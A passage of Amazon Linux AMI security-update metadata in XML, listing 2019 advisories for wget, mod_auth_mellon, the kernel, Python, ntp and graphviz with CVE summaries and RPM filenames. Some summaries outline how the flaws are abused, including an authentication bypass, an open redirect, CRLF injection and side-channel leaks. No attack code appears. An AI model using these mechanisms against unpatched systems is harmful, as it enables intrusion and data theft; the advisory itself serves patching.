arch="i686"><filename>Packages/mod24_session-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.39" release="1.87.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.39-1.87.amzn1.i686.rpm</filename></package><package name="mod24_md" 
version="2.4.39" release="1.87.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.39-1.87.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1194</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1194: important priority package update for wget</title><issued date="2019-04-17 18:51:00" /><updated date="2019-04-19 16:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-5953:
1695679:
CVE-2019-5953 wget: Buffer overflow vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5953" title="" id="CVE-2019-5953" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wget-debuginfo" version="1.18" release="5.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-debuginfo-1.18-5.30.amzn1.x86_64.rpm</filename></package><package name="wget" version="1.18" release="5.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-1.18-5.30.amzn1.x86_64.rpm</filename></package><package name="wget" version="1.18" release="5.30.amzn1" epoch="0" arch="i686"><filename>Packages/wget-1.18-5.30.amzn1.i686.rpm</filename></package><package name="wget-debuginfo" version="1.18" release="5.30.amzn1" epoch="0" arch="i686"><filename>Packages/wget-debuginfo-1.18-5.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1200</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1200: important priority package update for mod24_auth_mellon</title><issued date="2019-05-02 17:18:00" /><updated date="2019-05-06 17:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3878:
A vulnerability was found in mod_auth_mellon. If Apache is configured as a reverse proxy and mod_auth_mellon is configured to only let through authenticated users (with the require valid-user directive), adding the special HTTP headers that are normally used to start the SAML ECP (Enhanced Client or Proxy, non-browser) flow can be used to bypass authentication.
1691126:
CVE-2019-3878 mod_auth_mellon: authentication bypass in ECP flow
CVE-2019-3877:
A vulnerability was found in mod_auth_mellon before v0.14.2. An open redirect in the logout URL allows requests with backslashes to pass through by assuming that it is a relative URL, while the browsers silently convert backslash characters into forward slashes treating them as an absolute URL. This mismatch allows an attacker to bypass the redirect URL validation logic in apr_uri_parse function.
1691125:
CVE-2019-3877 mod_auth_mellon: open redirect in logout url when using URLs with backslashes
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3877" title="" id="CVE-2019-3877" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3878" title="" id="CVE-2019-3878" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_auth_mellon-diagnostics" version="0.14.0" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-diagnostics-0.14.0-2.8.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.14.0" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-debuginfo-0.14.0-2.8.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon" version="0.14.0" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-0.14.0-2.8.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-diagnostics" version="0.14.0" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-diagnostics-0.14.0-2.8.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.14.0" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-debuginfo-0.14.0-2.8.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon" version="0.14.0" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-0.14.0-2.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1201</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1201: important priority package update for kernel</title><issued date="2019-05-02 17:22:00" /><updated date="2019-05-06 17:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-7308:
A bypass was found for the Spectre v1 hardening in the eBPF engine of the Linux kernel. The code in the kernel/bpf/verifier.c performs undesirable out-of-bounds speculation on pointer arithmetic in various cases, including cases of different branches with different state or limits to sanitize, leading to side-channel attacks.
1672355:
CVE-2019-7308 kernel: eBPF: Spectre v1 mitigation bypass
CVE-2019-3460:
A flaw was found in the Linux kernel&#039;s implementation of logical link control and adaptation protocol (L2CAP), part of the Bluetooth stack in the l2cap_parse_conf_rsp and l2cap_parse_conf_req functions. An attacker with physical access within the range of standard Bluetooth transmission can create a specially crafted packet. The response to this specially crafted packet can contain part of the kernel stack which can be used in a further attack.
1663179:
CVE-2019-3460 kernel: Heap address information leak while using L2CAP_PARSE_CONF_RSP
CVE-2019-3459:
A flaw was found in the Linux kernel&#039;s implementation of Logical link control and adaptation protocol (L2CAP), part of the Bluetooth stack. An attacker with physical access within the range of standard Bluetooth transmission can create a specially crafted packet. The response to this specially crafted packet can contain part of the kernel stack which can be used in a further attack.
1663176:
CVE-2019-3459 kernel: Heap address information leak while using L2CAP_GET_CONF_OPT
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3459" title="" id="CVE-2019-3459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3460" title="" id="CVE-2019-3460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7308" title="" id="CVE-2019-7308" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" 
version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.114" release="82.97.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.114-82.97.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.114" release="82.97.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.114-82.97.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.114" release="82.97.amzn1" 
epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.114-82.97.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1202</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1202: important priority package update for python34</title><issued date="2019-05-02 17:31:00" /><updated date="2019-05-06 17:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9636:
Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization. The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly.
1688543:
CVE-2019-9636 python: Information Disclosure due to urlsplit improper NFKC normalization
CVE-2018-20406:
Modules/_pickle.c in Python before 3.7.1 has an integer overflow via a large LONG_BINPUT value that is mishandled during a &quot;resize to twice the size&quot; attempt. This issue might cause memory exhaustion, but is only relevant if the pickle format is used for serializing tens or hundreds of gigabytes of data.
1664509:
CVE-2018-20406 python: Integer overflow in Modules/_pickle.c allows for memory exhaustion if serializing gigabytes of data
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20406" title="" id="CVE-2018-20406" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9636" title="" id="CVE-2019-9636" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34" version="3.4.10" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.43.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.43.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.43.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.43.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.43.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.43.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.43.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.43.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.43.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.43.amzn1" 
epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.43.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.43.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1204</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1204: important priority package update for python36</title><issued date="2019-05-29 19:20:00" /><updated date="2019-08-06 21:28:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9947:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue.
1695572:
CVE-2019-9947 python: improper neutralization of CRLF sequences in urllib module
CVE-2019-9740:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the query string after a ? character) followed by an HTTP header or a Redis command.
1688169:
CVE-2019-9740 python: improper neutralization of CRLF sequences in urllib module
1688169:
CVE-2019-9740 python: CRLF injection via the query part of the url passed to urlopen()
CVE-2019-9636:
Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization. The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly.
1688543:
CVE-2019-9636 python: Information Disclosure due to urlsplit improper NFKC normalization
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9636" title="" id="CVE-2019-9636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9740" title="" id="CVE-2019-9740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9947" title="" id="CVE-2019-9947" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python36-devel" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.8-1.13.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.8-1.13.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.13.amzn1" epoch="0" 
arch="i686"><filename>Packages/python36-debug-3.6.8-1.13.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.8-1.13.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.8-1.13.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.8-1.13.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.8-1.13.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.8-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1205</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1205: important priority package update for kernel</title><issued date="2019-05-07 22:54:00" /><updated date="2019-05-14 23:05:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11091:
Uncacheable memory on some microprocessors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.
1705312:
CVE-2019-11091 hardware: Microarchitectural Data Sampling Uncacheable Memory (MDSUM)
CVE-2018-12130:
A flaw was found in the implementation of the &quot;fill buffer&quot;, a mechanism used by modern CPUs when a cache-miss is made on L1 CPU cache. If an attacker can generate a load operation that would create a page fault, the execution will continue speculatively with incorrect data from the fill buffer while the data is fetched from higher level caches. This response time can be measured to infer data in the fill buffer.
1646784:
CVE-2018-12130 hardware: Microarchitectural Fill Buffer Data Sampling (MFBDS)
CVE-2018-12127:
Microprocessors use a load port subcomponent to perform load operations from memory or IO. During a load operation, the load port receives data from the memory or IO subsystem and then provides the data to the CPU registers and operations in the CPU&#039;s pipelines. Stale load operation results are stored in the &#039;load port&#039; table until overwritten by newer operations. Certain load-port operations triggered by an attacker can be used to reveal data about previous stale requests, leaking data back to the attacker via a timing side-channel.
1667782:
CVE-2018-12127 hardware: Micro-architectural Load Port Data Sampling - Information Leak (MLPDS)
CVE-2018-12126:
Modern Intel microprocessors implement hardware-level micro-optimizations to improve the performance of writing data back to CPU caches. The write operation is split into STA (STore Address) and STD (STore Data) sub-operations. These sub-operations allow the processor to hand-off address generation logic into these sub-operations for optimized writes. Both of these sub-operations write to a shared distributed processor structure called the &#039;processor store buffer&#039;. As a result, an unprivileged attacker could use this flaw to read private data resident within the CPU&#039;s processor store buffer.
1646781:
CVE-2018-12126 hardware: Microarchitectural Store Buffer Data Sampling (MSBDS)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12126" title="" id="CVE-2018-12126" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12127" title="" id="CVE-2018-12127" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12130" title="" id="CVE-2018-12130" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11091" title="" id="CVE-2019-11091" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.114" release="83.126.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.114-83.126.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.114" 
release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.114-83.126.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.114" release="83.126.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.114-83.126.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1206</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1206: medium priority package update for ntp</title><issued date="2019-05-16 22:30:00" /><updated date="2019-05-20 19:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-8936:
NTP through 4.2.8p12 has a NULL Pointer Dereference.
1686605:
CVE-2019-8936 ntp: Crafted null dereference attack in authenticated mode 6 packet
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936" title="" id="CVE-2019-8936" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp-doc" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.8p12-1.41.amzn1.noarch.rpm</filename></package><package name="ntp" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.8p12-1.41.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.8p12-1.41.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.8p12-1.41.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.8p12-1.41.amzn1.x86_64.rpm</filename></package><package name="ntp-debuginfo" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.8p12-1.41.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.8p12-1.41.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.8p12" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.8p12-1.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1207</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1207: low priority package update for graphviz</title><issued date="2019-05-16 22:32:00" /><updated date="2019-05-20 18:59:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI 
that fix the following vulnerabilities:
CVE-2019-11023:
The agroot() function in cgraph\obj.c in libcgraph.a in Graphviz 2.39.20160612.1140 has a NULL pointer dereference, as demonstrated by graphml2gv.
1699848:
CVE-2019-11023 graphviz: null pointer dereference in function agroot() in cgraph\obj.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11023" title="" id="CVE-2019-11023" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-lua" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-lua-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-ruby" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-ruby-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-graphs" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-graphs-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-gd" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-gd-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-devel" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-devel-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-tcl" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-tcl-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-doc" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-doc-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-guile" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-guile-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-python27" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python27-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package 
name="graphviz-java" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-java-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-debuginfo" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-debuginfo-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-python26" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python26-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-R" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-R-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-perl" version="2.38.0" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-perl-2.38.0-18.51.amzn1.x86_64.rpm</filename></package><package name="graphviz-php54" version="2.38.0" release="18.51.amzn1" epoch="0" 